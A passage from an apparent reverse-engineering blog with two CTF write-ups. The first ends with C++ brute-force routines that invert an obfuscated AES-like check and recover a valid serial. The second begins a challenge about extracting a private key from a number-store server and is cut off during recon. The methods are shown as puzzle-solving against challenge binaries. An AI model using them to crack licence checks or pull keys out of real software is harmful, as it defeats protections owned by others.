    v90 = mask.m128i_u8[9];
    v70 = v54 + (uint64_t(Slot->m128i_u8[9]) << 8);
    v92 = mask.m128i_u8[10];
    v91 = &sboxes[v70];
    v71 = Slot->m128i_u8[10];
    v94 = mask.m128i_u8[11];
    v96 = mask.m128i_u8[12];
    v93 = &sboxes[256 * v71 + v54];
    v72 = Slot->m128i_u8[11];
    v98 = mask.m128i_u8[13];
    v95 = &sboxes[256 * v72 + v54];
    v73 = Slot->m128i_u8[12];
    v100 = mask.m128i_u8[14];
    v97 = &sboxes[256 * v73 + v54];
    v99 = &sboxes[256 * uint64_t(Slot->m128i_u8[13]) + v54];
    v101 = &sboxes[256 * uint64_t(Slot->m128i_u8[14]) + v54];
    Slot->m128i_u8[0] = v57[mask.m128i_u8[0]];
    Slot->m128i_u8[1] = v80[mask.m128i_u8[1] + 0x10000];
    Slot->m128i_u8[2] = v61[mask.m128i_u8[2] + 0x20000];
    Slot->m128i_u8[3] = v83[mask.m128i_u8[3] + 196608];
    Slot->m128i_u8[4] = v84[mask.m128i_u8[4] + 0x40000];
    Slot->m128i_u8[5] = v85[mask.m128i_u8[5] + 327680];
    Slot->m128i_u8[6] = v66[mask.m128i_u8[6] + 393216];
    Slot->m128i_u8[7] = v68[mask.m128i_u8[7] + 458752];
    Slot->m128i_u8[8] = v89[mask.m128i_u8[8] + 0x80000];
    Slot->m128i_u8[9] = v91[mask.m128i_u8[9] + 589824];
    Slot->m128i_u8[10] = v93[mask.m128i_u8[10] + 655360];
    Slot->m128i_u8[11] = v95[mask.m128i_u8[11] + 720896];
    Slot->m128i_u8[12] = v97[mask.m128i_u8[12] + 786432];
    Slot->m128i_u8[13] = v99[mask.m128i_u8[13] + 851968];
    Slot->m128i_u8[14] = v101[mask.m128i_u8[14] + 917504];
    Slot->m128i_u8[15] = sboxes[256 * uint64_t(Slot->m128i_u8[15]) + 983040 + v54 + mask.m128i_u8[15]];
    *Slot = _mm_xor_si128(*Slot, crc);
    break;
}

The thing I always focus on is: the relationship between the input and output bytes. Remember that each round works as a function that takes a 16 bytes blob in input (a Slot_t in my code) and returns another 16 bytes blob as output. As we are interested in writing a function that can find an input that generates a specific output it is very important to identify how the output is built and what input bytes are used to build it.

Let's have a closer look at how the first byte of the output is generated. We start from the end of the function and we follow back the references until we encounter a byte from the input state. In this case we trace back where v57 is coming from, and then v55 and v56. v55 is the first byte of the input state, great. v56 is a a number encoding the number of the round. We don't necessarily care about it as of now, but it's good to realize that the number of the round is a parameter of this function; and not exclusively the inputs bytes. OK so we know that the first byte of the output is built via the first byte of the input, easy. Simpler than I first expected when looking at the Hex-Rays' output to be honest. But I'll take simple :).

If you repeat the above steps for every byte you basically realize that each byte of the output is dependent on one single byte of input. They are all independent from one another which is even nicer. What this means is that we can very easily brute-force an input value to generate a specific output value. That's great because it is ... very cheap to compute; so cheap that we don't even bother and we move on to the next case.

In theory we could even parallelize the below but it's probably not worth doing as already fast.

void reverse_37(const uint32_t nround, Slot_t &Output, Slot_t &Input) {
    uint8_t is[16];
    for (uint32_t i = 0; i < 16; ++i) {
        for (uint32_t c = 0; c < 0x100; ++c) {
            Input.m128i_u8[i] = c;
            round(nround, &Input);
            if (Input.m128i_u8[i] == Output.m128i_u8[i]) {
                is[i] = c;
                break;
            }
        }
    }
    memcpy(Input.m128i_u8, is, 16);
}

Funny enough, if you patched the challenge binary this is yet another spot where things would go wrong. The crc value is used at the end of the function to XOR the output state and would pollute your results here, sneaky :).

case 2, 6, 10, 14, 18, 22, 26, 30, 34, 38: ShiftRows

Not bad, we already figured out two cases out of the six. This case doesn't look too bad either, it is pretty short and writing an inverse looks easy enough:

case 2:
case 6:
case 10:
case 14:
case 18:
case 22:
case 26:
case 30:
case 34:
case 38: {
    v42 = Slot->m128i_u8[6];
    v43 = Slot->m128i_u8[4];
    v44 = Slot->m128i_u8[5];
    Slot->m128i_u8[6] = Slot->m128i_u8[7];
    Slot->m128i_u8[5] = v42;
    v45 = Slot->m128i_u8[8];
    v46 = Slot->m128i_u8[11];
    Slot->m128i_u8[4] = v44;
    Slot->m128i_u8[7] = v43;
    v47 = Slot->m128i_u8[10];
    v48 = Slot->m128i_u8[9];
    Slot->m128i_u8[10] = v45;
    Slot->m128i_u8[9] = v46;
    v49 = Slot->m128i_u8[13];
    v50 = Slot->m128i_u8[12];
    Slot->m128i_u8[8] = v47;
    Slot->m128i_u8[11] = v48;
    v51 = Slot->m128i_u8[15];
    v52 = Slot->m128i_u8[14];
    Slot->m128i_u8[13] = v50;
    Slot->m128i_u8[14] = v49;
    Slot->m128i_u8[12] = v51;
    Slot->m128i_u8[15] = v52;
    break;
}

Clearly just by quickly looking at this function you understand that it is some sort of shuffling operation. For whatever reason, this is the type of brain-gymnastic that I am not good at. The trick I usually use is to give it an input that looks like this: \x00\x01\x02\x03... and observe the result.

void test_reverse38() {
    const uint8_t Input[16] {
        0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
        0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f
    };
    Slot_t InputSlot;
    memcpy(&InputSlot.m128i_u8, Input, 16);
    round(38, &InputSlot);
    hexdump(stdout, &InputSlot.m128i_u8, 16);
}

This is what we get if we apply the above trick:

0000:   00 01 02 03 05 06 07 04   0A 0B 08 09 0F 0C 0D 0E    ................

From here, it's much easier (for me at least) to figure out the effect of the shuffling. For example, we already know we have nothing to do with the first four bytes as they haven't been shuffled. We know we need to take Output[7] and put it inside Input[4], Output[4] in Input[5], so on and so forth. After a bit of mental gymnastics I end-up with this routine:

void reverse_38(Slot_t &Output, Slot_t &Input) {
    uint8_t s4 = Output.m128i_u8[4];
    Output.m128i_u8[4] = Output.m128i_u8[7];
    uint8_t s5 = Output.m128i_u8[5];
    Output.m128i_u8[5] = s4;
    uint8_t s6 = Output.m128i_u8[6];
    Output.m128i_u8[6] = s5;
    uint8_t s7 = Output.m128i_u8[7];
    Output.m128i_u8[7] = s6;
    uint8_t s8 = Output.m128i_u8[8];
    Output.m128i_u8[8] = Output.m128i_u8[10];
    uint8_t s9 = Output.m128i_u8[9];
    Output.m128i_u8[9] = Output.m128i_u8[11];
    Output.m128i_u8[10] = s8;
    Output.m128i_u8[11] = s9;
    uint8_t s12 = Output.m128i_u8[12];
    Output.m128i_u8[12] = Output.m128i_u8[13];
    uint8_t s13 = Output.m128i_u8[13];
    Output.m128i_u8[13] = Output.m128i_u8[14];
    Output.m128i_u8[14] = Output.m128i_u8[15];
    Output.m128i_u8[15] = s12;
    memcpy(Input.m128i_u8, Output.m128i_u8, 16);
}

Next one!

case 3, 7, 11, 15, 19, 23, 27, 31, 35: MixColumns

This case is the most annoying one basically. At first sight, it looks very similar to the case 1 we analyzed earlier, but ... not quite.

case 3:
case 7:
case 11:
case 15:
case 19:
case 23:
case 27:
case 31:
case 35: {
    v7 = Slot->m128i_u8[0];
    v8 = Slot->m128i_u8[4];
    v9 = Slot->m128i_u8[1];
    v10 = Slot->m128i_u8[5];
    v11 = Slot->m128i_u8[14] ^ Slot->m128i_u8[10];
    v12 = mul3[v8] ^ mul2[v7] ^ Slot->m128i_u8[12] ^ Slot->m128i_u8[8];
    v81 = Slot->m128i_u8[3];
    uint8_t v78x = v12;
    uint8_t v79x = mul3[v10] ^ mul2[v9] ^ Slot->m128i_u8[13] ^ Slot->m128i_u8[9];
    v77.m128i_u64[0] = Slot->m128i_u8[2];
    v13 = mul2[v77.m128i_u64[0]] ^ v11;
    v14 = Slot->m128i_u8[6];
    uint8_t v80x = mul3[v14] ^ v13;
    v15 = Slot->m128i_u8[7];
    uint8_t v82x = mul3[v15] ^ mul2[v81] ^ Slot->m128i_u8[15] ^ Slot->m128i_u8[11];
    v16 = mul2[v8] ^ Slot->m128i_u8[12] ^ Slot->m128i_u8[0];
    v17 = Slot->m128i_u8[8];
    uint8_t v83x = mul3[v17] ^ v16;
    v18 = mul2[v10] ^ Slot->m128i_u8[13] ^ Slot->m128i_u8[1];
    v19 = Slot->m128i_u8[9];
    v20 = Slot->m128i_u8[14] ^ Slot->m128i_u8[2];
    uint8_t v84x = mul3[v19] ^ v18;
    v21 = mul2[v14] ^ v20;
    v22 = Slot->m128i_u8[10];
    v23 = Slot->m128i_u8[15] ^ Slot->m128i_u8[3];
    uint8_t v85x = mul3[v22] ^ v21;
    v24 = mul2[v15] ^ v23;
    v25 = Slot->m128i_u8[11];
    v26 = Slot->m128i_u8[4] ^ Slot->m128i_u8[0];
    uint8_t v86x = mul3[v25] ^ v24;
    v27 = mul2[v17] ^ v26;
    v28 = Slot->m128i_u8[12];
    v29 = Slot->m128i_u8[5] ^ Slot->m128i_u8[1];
    uint8_t v87x = mul3[v28] ^ v27;
    v30 = mul2[v19] ^ v29;
    v31 = Slot->m128i_u8[13];
    v32 = Slot->m128i_u8[6] ^ Slot->m128i_u8[2];
    uint8_t v88x = mul3[v31] ^ v30;
    v33 = mul2[v22] ^ v32;
    v34 = Slot->m128i_u8[14];
    v35 = Slot->m128i_u8[7] ^ Slot->m128i_u8[3];
    uint8_t v89x = mul3[v34] ^ v33;
    v36 = mul2[v25] ^ v35;
    v37 = Slot->m128i_u8[15];
    v38 = Slot->m128i_u8[8] ^ Slot->m128i_u8[4];
    uint8_t v90x = mul3[v37] ^ v36;
    uint8_t v7x = mul2[v28] ^ v38 ^ mul3[v7];
    v9 = mul2[v31] ^ Slot->m128i_u8[9] ^ Slot->m128i_u8[5] ^ mul3[v9];
    v39 = mul3[v77.m128i_u64[0]] ^ mul2[v34] ^ Slot->m128i_u8[10] ^ Slot->m128i_u8[6];
    v40 = mul3[v81] ^ Slot->m128i_u8[11] ^ Slot->m128i_u8[7] ^ mul2[v37];
    Slot->m128i_u8[0] = v78x;
    Slot->m128i_u8[1] = v79x;
    Slot->m128i_u8[2] = v80x;
    Slot->m128i_u8[3] = v82x;
    Slot->m128i_u8[4] = v83x;
    Slot->m128i_u8[5] = v84x;
    Slot->m128i_u8[6] = v85x;
    Slot->m128i_u8[7] = v86x;
    Slot->m128i_u8[8] = v87x;
    Slot->m128i_u8[9] = v88x;
    Slot->m128i_u8[10] = v89x;
    Slot->m128i_u8[11] = v90x;
    Slot->m128i_u8[12] = v7x;
    Slot->m128i_u8[13] = uint8_t(v9);
    Slot->m128i_u8[14] = v39;
    Slot->m128i_u8[15] = v40;
    break;
}

This time if we take a closer look, we notice that each group of four bytes of output depends of four bytes of input. And every byte of those four bytes of output depend on those four input bytes.

This means that you cannot brute force byte by byte like earlier. You have to brute force four bytes... which is much more costly compared to what we've seen above. The only thing going for us is that we can brute force them in parallel as they are independent from each other. A thread for each should do the work.

At this stage I already wasted a bunch of time on various bugs or stupid things; so I decided to write this very simple naive brute force function (it's neither pretty nor fast... but I've made peace with it at this point):

void reverse_35(Slot_t &Output, Slot_t &Input) {
    uint8_t final_result[16];
    std::thread t0([Input, Output, &final_result]() mutable {
        for (uint64_t a = 0; a < 0x100; ++a) {
            for (uint64_t b = 0; b < 0x100; ++b) {
                for (uint64_t c = 0; c < 0x100; ++c) {
                    for (uint64_t d = 0; d < 0x100; ++d) {
                        Input.m128i_u8[0] = uint8_t(a);
                        Input.m128i_u8[4] = uint8_t(b);
                        Input.m128i_u8[8] = uint8_t(c);
                        Input.m128i_u8[12] = uint8_t(d);
                        round(35, &Input);
                        if (Input.m128i_u8[0] == Output.m128i_u8[0] && Input.m128i_u8[4] == Output.m128i_u8[4] &&
                            Input.m128i_u8[8] == Output.m128i_u8[8] && Input.m128i_u8[12] == Output.m128i_u8[12]) {

                            final_result[0] = uint8_t(a);
                            final_result[4] = uint8_t(b);
                            final_result[8] = uint8_t(c);
                            final_result[12] = uint8_t(d);
                            return;
                        }
                    }
                }
            }
        }
    });
    std::thread t1([Input, Output, &final_result]() mutable {
        for (uint64_t a = 0; a < 0x100; ++a) {
            for (uint64_t b = 0; b < 0x100; ++b) {
                for (uint64_t c = 0; c < 0x100; ++c) {
                    for (uint64_t d = 0; d < 0x100; ++d) {
                        Input.m128i_u8[1] = uint8_t(a);
                        Input.m128i_u8[5] = uint8_t(b);
                        Input.m128i_u8[9] = uint8_t(c);
                        Input.m128i_u8[13] = uint8_t(d);
                        round(35, &Input);
                        if (Input.m128i_u8[1] == Output.m128i_u8[1] && Input.m128i_u8[5] == Output.m128i_u8[5] &&
                            Input.m128i_u8[9] == Output.m128i_u8[9] && Input.m128i_u8[13] == Output.m128i_u8[13]) {

                            final_result[1] = uint8_t(a);
                            final_result[5] = uint8_t(b);
                            final_result[9] = uint8_t(c);
                            final_result[13] = uint8_t(d);
                            return;
                        }
                    }
                }
            }
        }
    });
    std::thread t2([Input, Output, &final_result]() mutable {
        for (uint64_t a = 0; a < 0x100; ++a) {
            for (uint64_t b = 0; b < 0x100; ++b) {
                for (uint64_t c = 0; c < 0x100; ++c) {
                    for (uint64_t d = 0; d < 0x100; ++d) {
                        Input.m128i_u8[2] = uint8_t(a);
                        Input.m128i_u8[6] = uint8_t(b);
                        Input.m128i_u8[10] = uint8_t(c);
                        Input.m128i_u8[14] = uint8_t(d);
                        round(35, &Input);
                        if (Input.m128i_u8[2] == Output.m128i_u8[2] && Input.m128i_u8[6] == Output.m128i_u8[6] &&
                            Input.m128i_u8[10] == Output.m128i_u8[10] && Input.m128i_u8[14] == Output.m128i_u8[14]) {

                            final_result[2] = uint8_t(a);
                            final_result[6] = uint8_t(b);
                            final_result[10] = uint8_t(c);
                            final_result[14] = uint8_t(d);
                            return;
                        }
                    }
                }
            }
        }
    });
    std::thread t3([Input, Output, &final_result]() mutable {
        for (uint64_t a = 0; a < 0x100; ++a) {
            for (uint64_t b = 0; b < 0x100; ++b) {
                for (uint64_t c = 0; c < 0x100; ++c) {
                    for (uint64_t d = 0; d < 0x100; ++d) {
                        Input.m128i_u8[3] = uint8_t(a);
                        Input.m128i_u8[7] = uint8_t(b);
                        Input.m128i_u8[11] = uint8_t(c);
                        Input.m128i_u8[15] = uint8_t(d);
                        round(35, &Input);
                        if (Input.m128i_u8[3] == Output.m128i_u8[3] && Input.m128i_u8[7] == Output.m128i_u8[7] &&
                            Input.m128i_u8[11] == Output.m128i_u8[11] && Input.m128i_u8[15] == Output.m128i_u8[15]) {

                            final_result[3] = uint8_t(a);
                            final_result[7] = uint8_t(b);
                            final_result[11] = uint8_t(c);
                            final_result[15] = uint8_t(d);
                            return;
                        }
                    }
                }
            }
        }
    });

    t0.join();
    t1.join();
    t2.join();
    t3.join();
    memcpy(Input.m128i_u8, final_result, 16);
    return;
}

Each thread recovers four bytes and the results are aggregated in final_result, easy.

case 4, 8, 12, 16, 20, 24, 28, 32, 36: AddRoundKey

This case is another trivial one where a simple XOR does the job to invert the operation:

case 4:
case 8:
case 12:
case 16:
case 20:
case 24:
case 28:
case 32:
case 36: {
    *Slot = _mm_xor_si128(_mm_load_si128(Slot), mask3);
    break;
}

Note that mask3 is one of the arrays that gets modified when you introduce an abnormal delay in a round; like if you're debugging for example. Yet another spot where wrong results could be produced :).

void reverse_36(Slot_t &Output, Slot_t &Input) {
    Input = _mm_xor_si128(_mm_load_si128(&Output), mask3);
}

case 39: decoding

And finally our last case is another very simple one:

case 39: {
    *Slot = _mm_xor_si128(_mm_load_si128(Slot), shiftedmask);
    break;
}

Inverted with the below:

void reverse_39(Slot_t &Output, Slot_t &Input) {
    Input = _mm_xor_si128(_mm_load_si128(&Output), shiftedmask);
}

unround

At this stage we have all the small blocks we need to find an input state that generates a specific output state. We simply combine all the reverse_ routines we wrote into a function that basically is the inverse of schedule. We also create a utility function that applies forty unround to a state in order to fully invert it: from bottom to top.

void recover_state(Slot_t &Output, Slot_t &Input) {
    for (int32_t i = 39; i > -1; --i) {
        unround(i, Output, Input);
        memcpy(Output.m128i_u8, Input.m128i_u8, 16);
    }
}

Once we have that available we can use it in order to do try to - let's say - find the input bytes that generates the following output 'doar-e.github.io'.encode('hex').

void recover_doare() {
    const uint8_t WantedOutputBytes[16] {
        // In [17]: ', '.join('0x%2x' % ord(c) for c in 'doar-e.github.io')
        // Out[17]: '0x64, 0x6f, 0x61, 0x72, 0x2d, 0x65, 0x2e, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62, 0x2e, 0x69, 0x6f'
        0x64, 0x6f, 0x61, 0x72, 0x2d, 0x65, 0x2e, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62, 0x2e, 0x69, 0x6f
    };
    Slot_t WantedOutput, Input;
    memcpy(WantedOutput.m128i_u8, WantedOutputBytes, 16);
    recover_state(WantedOutput, Input);
    hexdump(stdout, Input.m128i_u8, 16);
}

This gives us back the following (it takes about 7 min on my machine VS 13 min without the multi threaded version of reverse_35):

0000:   0D CC 49 C2 F8 E1 6A 78   1D 57 26 F7 45 AB 3E 13    ..I...jx.W&.E.>.

To ensure that it works properly we can fire up gdb and inject this state right before the scheduling phase like in the below:

gef➤  pie breakpoint *0x114c
gef➤  pie run
[...]
gef➤  eb &states 0x0D 0xCC 0x49 0xC2 0xF8 0xE1 0x6A 0x78 0x1D 0x57 0x26 0xF7 0x45 0xAB 0x3E 0x13
gef➤  x/16bx &states
0x555556257660 <states>:        0x0d    0xcc    0x49    0xc2    0xf8    0xe1    0x6a    0x78
0x555556257668 <states+8>:      0x1d    0x57    0x26    0xf7    0x45    0xab    0x3e    0x13
g
gef➤  x/i $rip
=> 0x55555555514c <main+1276>:  call   0x555555555660 <_Z8schedulev>
gef➤  n
gef➤  x/i $rip
=> 0x555555555151 <main+1281>:  movdqa xmm0,XMMWORD PTR [rip+0xd02517]        # 0x555556257670 <states+16>
gef➤  x/16bx &states
0x555556257660 <states>:        0x64    0x6f    0x61    0x72    0x2d    0x65    0x2e    0x67
0x555556257668 <states+8>:      0x69    0x74    0x68    0x75    0x62    0x2e    0x69    0x6f
gef➤  x/1s &states
0x555556257660 <states>:        "doar-e.github.iovطL:2\204\274\006\"A\377+ⴄ\256^\264)\220\024\307\356dO\377a\003Q}\317+\352\064\303I\300\254\256\271\061\306\004\327\033\375\307B\357\375m\027u\024\060\315t\a\034\247\224\027\005\202\021oK\366\267>\373X`?\027\071*\333\301\357\a\260\256\063k}u\232f\212\212\246'\303j\027\201\061@\246\336\304mۡ\bSi\214\034\210D\327.hQ\310\302I,\225zF\263안vطL:2\204\274\006\"A\377+ⴄ\256^\264)\220\024\307\356dO\377a\003Q}\317+\352\064\303I\300\254\256\271\061\306\004\327\033\375\307B\357\375m\027u\024\060\315t\a\034\247\224\027\005\202\021oK\366\267>\373X`?\027\071*\333\301\357\a\260\256\063k}u\232f\212\212\246'\303j\233\004WD\345\037\360\371\350JT\332h\340R\270\223\256\247\356͚C\211\374\327=\022>\222\301\346 \031\313]\272\274=t\302>:\245qZ\363[\223\256\247\356\211͚C=\022\374ג\301\346>"

All right, awesome. Sounds like we are done with schedule for now :).

How do I win now?

From above, we already established that the 15 s's blobs get XOR'ed together and if the result is 0x42424242696969693737373713131313ULL then it's a win, great. We also know that the input serial is diffused in those 15 blobs. In each blob, there are all the bytes of the serial input. They are just mixed in differently depending on which blob it is. What this means is that when we give the good serial to the program, we can fully control only one of those blobs. And as they are XOR'ed together it's unclear at first sight how we can get the resulting XOR equal to the magic value, strange.

After being stuck a bit on this (and still being mad at myself for it D:), my friend mongo asked me if I really took a look at what the 15 blobs look like. Ugh, I guess I kinda did? At this point I fired up my debugger and saw the below fifteen blobs (for the following serial 00112233445566778899AABBCCDDEEFF):

gef➤  pie breakpoint *0x0000000000001144c
gef➤  pie run
gef➤  x/240bx &states
0x555556257660 <states>:        0x66    0xcc    0x33    0x55    0x88    0xee    0x77    0x00    0xdd    0x22    0x99    0x11    0xff    0xbb    0x44    0xaa
0x555556257670 <states+16>:     0xff    0xcc    0x66    0xaa    0x99    0x55    0x22    0x00    0x77    0x11    0x88    0xbb    0xdd    0x33    0xee    0x44
0x555556257680 <states+32>:     0xaa    0x33    0xdd    0xcc    0x66    0xee    0x11    0x44    0xbb    0x55    0x77    0xff    0x22    0x00    0x88    0x99
0x555556257690 <states+48>:     0xaa    0x55    0x33    0x11    0xbb    0xdd    0x66    0xcc    0x22    0xff    0x44    0x88    0xee    0x77    0x99    0x00
0x5555562576a0 <states+64>:     0x00    0x66    0xbb    0x77    0xff    0x55    0x88    0x33    0x11    0x44    0x99    0x22    0xcc    0xdd    0xaa    0xee
0x5555562576b0 <states+80>:     0x22    0x00    0x33    0xbb    0xcc    0x88    0x44    0xdd    0x77    0x55    0xaa    0x11    0x66    0xff    0xee    0x99
0x5555562576c0 <states+96>:     0xcc    0xff    0x00    0x44    0xbb    0x66    0xaa    0x11    0x99    0x55    0xee    0x33    0x22    0x77    0x88    0xdd

0x5555562576d0 <states+112>:    0x00    0x44    0x88    0xcc    0x11    0x55    0x99    0xdd    0x22    0x66    0xaa    0xee    0x33    0x77    0xbb    0xff

0x5555562576e0 <states+128>:    0x66    0xcc    0x33    0x55    0x88    0xee    0x77    0x00    0xdd    0x22    0x99    0x11    0xff    0xbb    0x44    0xaa
0x5555562576f0 <states+144>:    0xff    0xcc    0x66    0xaa    0x99    0x55    0x22    0x00    0x77    0x11    0x88    0xbb    0xdd    0x33    0xee    0x44
0x555556257700 <states+160>:    0xaa    0x33    0xdd    0xcc    0x66    0xee    0x11    0x44    0xbb    0x55    0x77    0xff    0x22    0x00    0x88    0x99
0x555556257710 <states+176>:    0xaa    0x55    0x33    0x11    0xbb    0xdd    0x66    0xcc    0x22    0xff    0x44    0x88    0xee    0x77    0x99    0x00
0x555556257720 <states+192>:    0x00    0x66    0xbb    0x77    0xff    0x55    0x88    0x33    0x11    0x44    0x99    0x22    0xcc    0xdd    0xaa    0xee
0x555556257730 <states+208>:    0x22    0x00    0x33    0xbb    0xcc    0x88    0x44    0xdd    0x77    0x55    0xaa    0x11    0x66    0xff    0xee    0x99
0x555556257740 <states+224>:    0xcc    0xff    0x00    0x44    0xbb    0x66    0xaa    0x11    0x99    0x55    0xee    0x33    0x22    0x77    0x88    0xdd

Do you see it now? If you look closely, you can see that states[0] = states[8], states[1] = states[9], states[2] = states[10], etc. Which means that XORing them together cancels them out.. leaving the one blob in the middle: states[7].

0x5555562576d0 <states+112>:    0x00    0x44    0x88    0xcc    0x11    0x55    0x99    0xdd    0x22    0x66    0xaa    0xee    0x33    0x77    0xbb    0xff

So now we just have to invoke recover_state in order to find an input state that generates this output state: 42424242696969693737373713131313. When we have recovered the sixteen bytes of input we need to study the diffusion algorithm a little to be able to construct an input serial that generates the states[7] of our choice (slot2password), easy.

void pwn() {
    const uint8_t WantedOutputBytes[16] {
        0x13, 0x13, 0x13, 0x13, 0x37, 0x37, 0x37, 0x37, 0x69, 0x69, 0x69, 0x69, 0x42, 0x42, 0x42, 0x42,
    };
    Slot_t WantedOutput, Input;
    memcpy(WantedOutput.m128i_u8, WantedOutputBytes, 16);
    recover_state(WantedOutput, Input);
    hexdump(stdout, Input.m128i_u8, 16);
    uint8_t Password[16];
    slot2password(Input.m128i_u8, Password);
    for (size_t i = 0; i < 16; ++i) {
        printf("%.2X", Password[i]);
    }
    printf("\n");
}

And after running this for a bit of time we get the below output:

c:\work>C:\work\unboxin-ctf2.exe
0000:   0A 0E C2 74 B7 C6 41 70   98 5F 2D D7 2C C9 52 68    ...t..Ap._-.,.Rh
0AB7982C0EC65FC9C2412D527470D768
e min elapsed

Mandatory final check now..:

over@bubuntu:~/workz$ ./ctf2 0AB7982C0EC65FC9C2412D527470D768
**** Login Successful ****

Job done :-).

Conclusion

Interestingly, while I was writing up this article, ledger posted one describing the puzzles and some of the solutions they have received. You should definitely check it out: CTF complete - HW bounty still ongoing. The other interesting thing is, as usual, there are many ways leading to victory.

What's fascinating about it, is that in this specific case, studying the cryptography closer has allowed some people to directly extract the AES key. At that point writing a solution becomes trivial: decrypt a blob with AES and the extracted key. No need for any reimplementing any of the program's logic. That's very cool! But there's been an even richer spectrum of solutions: fault injections, side channel attacks, reverse-engineering, etc. That's also why I would definitely recommend to go and read other people solutions :).

In any case, I've uploaded my solution file unboxin-ctf2.cc on my github as usual, enjoy!

Last but not least, special thanks to my mates yrp604 and mongo for proofreading and edits :)

beVX challenge on the operation table

Introduction

About two weeks ago, my friend mongo challenged me to solve a reverse-engineering puzzle put up by the SSD team for OffensiveCon2018 (which is a security conference that took place in Berlin in February). The challenge binary is available for download here and here is one of the original tweet advertising it.

With this challenge, you are tasked to reverse-engineer a binary providing some sort of encryption service, and there is supposedly a private key (aka the flag) to retrieve. A remote server with the challenge running is also available for you to carry out your attack. This looked pretty interesting as it was different than the usual keygen-me type of reverse-engineering challenge.

Unfortunately, I didn't get a chance to play with this while the remote server was up (the organizers took it down once they received the solutions of the three winners). However, cool thing is that you can easily manufacture your own server to play at home.. which is what I ended up doing.

As I thought the challenge was cute enough, and that I would also like to write on a more regular basis, so here is a small write-up describing how I abused the server to get the private key out. Hope you don't find it too boring :-).

Playing at home

Before I start walking you through my solution, here is a very simple way for you to set it up at home. You just have to download a copy of the binary here, and create a fake encryption library that exports the encrypt/decrypt routines as well as the key material (private_key / private_key_length):

#include <stdio.h>
#include <stdint.h>
#include <inttypes.h>

uint32_t number_of_rows = 16;
uint32_t private_key_length = 32;
uint8_t private_key[32] = { 1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 0 };

const uint64_t k = 0xba0bab;

uint64_t decrypt(uint64_t x) {
    printf("decrypt(%" PRIx64 ") = %" PRIx64 "\n", x, x ^ k);
    return x ^ k;
}

uint64_t encrypt(uint64_t y) {
    printf("encrypt(%" PRIx64 ") = %" PRIx64 "\n", y, y ^ k);
    return y ^ k;
}

The above file can be compiled with the below command:

$ clang++ -shared -o lib.so -fPIC lib.cc

Dropping the resulting lib.so shared library file inside the same directory as the challenge should be enough to have it properly run. You can even hook it up to a socket via socat to simulate a remote server you have to attack:

$ socat -vvv TCP-LISTEN:31337,fork,reuseaddr EXEC:./cha1

If everything worked as advertised, you should now be able to interact with the challenge remotely and be greeted by the below menu when connected to it:

Please choose your option:
0. Store Number
1. Get Number
2. Add
3. Subtract
4. Multiply
5. Divide
6. Private Key Encryption
7. Binary Representation
8. Exit

Off you go have fun now :)

Recon

When I start looking at a challenge I always spend time to understand a bit more of the story around it. This both gives me direction as well as helps me identify pitfalls. For example here, the story tells me that we have a secret to exfiltrate and focusing the analysis on the code interacting / managing this secret sounds like a good idea. The challenge was also advertised as a reverse-engineering task so I didn't really expect any pwning. A logical flaw, design issue or a very constrained memory corruption type of issue is what I was looking for.

recon.png

Once base64-decoded, the binary is a 10KB (small) unprotected ELF64. The binary is PIE and imports a bunch of data / functions from a file named lib.so that we don't have access to. Based on the story we have been given, we can expect both the key materials and the encryption / decryption routines stored there.

extern:0000000000202798 ; _QWORD __cdecl decrypt(unsigned __int64)
extern:0000000000202798                 extrn _Z7decryptm:near  ; DATA XREF: .got.plt:off_202020↑o
extern:00000000002027A0 ; _QWORD __cdecl encrypt(unsigned __int64)
extern:00000000002027A0                 extrn _Z7encryptm:near  ; DATA XREF: .got.plt:off_202028↑o

Even though the challenge seems to use C++ and the STL, the disassembled / decompiled code is very easy to read so it doesn't take a whole lot of time to understand a bit more what this thing is doing.

According to what the menu says, it looks like a store of numbers; whatever that means. Quick reverse-engineering of the getter and setter functions we learn a bit more of what is a number. First, every number (number_t) being stored is encrypted when inserted into the store, and decrypted when retrieved out of the store.

uint64_t write_number_to_store(number_t *number2write, uint64_t value, bool encrypted)
{
    uint64_t encrypted_val = value;
    if(encrypted) {
    encrypted_val = encrypt(value);
    }

    size_t bitidx = 31LL;
    do
    {
    uint8_t curr_encrypted_val = encrypted_val;
    encrypted_val >>= 1;
    number2write->bytes[bitidx--] = curr_encrypted_val & 1;
    } while ( bitidx != -1 );
    return encrypted_val;
}

Interestingly, the third argument of the function allows you to write a clear-text number into the store but it is apparently not used anywhere in the challenge.. oh well :)

Once the numbers are encrypted, they also get encoded with a very simple transformation: every bit is written to a byte (0 or 1). As the numbers being stored are 32 bits integers, naturally the store needs 32 bytes per number.

00000000 number_t        struc ; (sizeof=0x20)
00000000 bytes           db 32 dup(?)
00000020 number_t        ends

After looking a bit more at the other options, and with the above in mind, it is pretty straightforward to recover part of the structure that keeps the global state of the store (state_t). The store has a maximum capacity of 32 slots, the current size of the store is stored in the lower 5 bits (2**5 = 32) of some sort of status variable. At this point I started drafting the structure state_t:

00000000 state_t         struc ; (sizeof=0x440, align=0x8)
00000000 numbers         number_t 32 dup(?)
00000400 pkey            dq ?
00000408 size            db ?
00000409                 db ? ; undefined
0000040A                 db ? ; undefined
0000040B                 db ? ; undefined
0000040C                 db ? ; undefined
0000040D                 db ? ; undefined
0000040E                 db ? ; undefined
0000040F                 db ? ; undefined
00000410 x               dw ?
00000412 xx              db 38 dup(?)
00000438 xxx             dq ?
00000440 state_t         ends

The Private Key Encryption function is the one that looked a bit more involved than the others. But as far as I was concerned, it was doing ""arithmetic"" on numbers that you previously had stored: one called the message and one called the key.

Before actually starting to look for issues, I needed to answer two questions:

  1. Where is the key stored?
  2. What prevents me from accessing it?

By looking at the store initialization code we can answer the first question. The content of private_key is put inside the store in the slot number_of_rows + 2. Right after, the size of the store is set to number_of_rows. The net result of this operation being - assuming proper bounds-checking from all the commands interacting with the store - that the user cannot access the key directly.

Finding the needle: getting access to the key material

Fortunately for us there's not that much code, so auditing every command is easy enough. All the commands actually do a good job at sanitizing things at first sight. Every time the application asks for a slot index, it is bounds-checked against the store size before getting used. It even throws an out-of-range exception if you are trying to access an out-of-bounds slot. Here is an example with the divide operation (number_store is the global state, NumberOfNumbers is a mask extracting the lower 5 bits of the size field to compute the current size of the store):

